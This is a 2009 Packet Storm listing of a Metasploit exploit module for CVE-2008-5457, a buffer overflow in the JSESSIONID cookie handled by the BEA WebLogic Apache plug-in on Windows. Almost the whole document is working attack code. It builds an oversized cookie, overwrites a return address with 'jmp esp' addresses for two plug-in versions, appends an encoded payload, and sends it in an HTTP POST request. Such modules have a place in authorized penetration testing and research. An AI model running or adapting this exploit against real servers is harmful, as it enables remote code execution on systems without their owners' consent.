BEA Weblogic JSESSIONID Cookie Value Overflow

2009-11-26T00:00:00
ID PACKETSTORM:83224
Type packetstorm
Reporter Pusscat
Modified 2009-11-26T00:00:00

Description

                                        
                                            `##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::Tcp  
include Msf::Exploit::Remote::Seh  
  
def initialize(info = {})  
super(update_info(info,   
'Name' => 'BEA Weblogic JSESSIONID cookie value overflow',  
'Description' => %q{  
This module exploits a 0day in the JSESSION cookie value when clustering is configured.  
},  
'Author' => 'pusscat',  
'References' =>  
[  
[ 'CVE', '2008-5457' ],  
[ 'OSVDB', '51311' ],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'seh',  
},  
'Privileged' => true,  
'Platform' => 'win',  
'Payload' =>  
{  
'Space' => 800,  
'BadChars' => "\x00\x0d\x0a\x20\x3B\x3D\x2C",  
'StackAdjustment' => -3500,  
  
},  
'Targets' =>   
[  
[ 'Windows Apache 2.2 - weblogic module version 1.0.1136334',  
{  
'Ret' => 0x1006c9b5, # jmp esp  
}  
],  
[ 'Windows Apache 2.2 - weblogic module version 1.0.1150354',  
{  
'Ret' => 0x1006c9be, # jmp esp  
}  
],  
],  
'DefaultTarget' => 1))  
register_options( [ Opt::RPORT(80) ], self.class )  
end  
  
def exploit  
sploit = Rex::Text.rand_text_alphanumeric(10000, payload_badchars)  
sploit[8181, 4] = [target.ret].pack('V')  
sploit[8185, payload.encoded.length] = payload.encoded  
  
request =   
"POST /index.jsp HTTP/1.1\r\nHost: localhost\r\nCookie: TAGLINE=IAMMCLOVIN; JSESSIONID=" +  
sploit +   
"\r\n\r\n"  
  
connect  
sock.put(request);  
handler  
  
disconnect  
end  
  
end  
  
`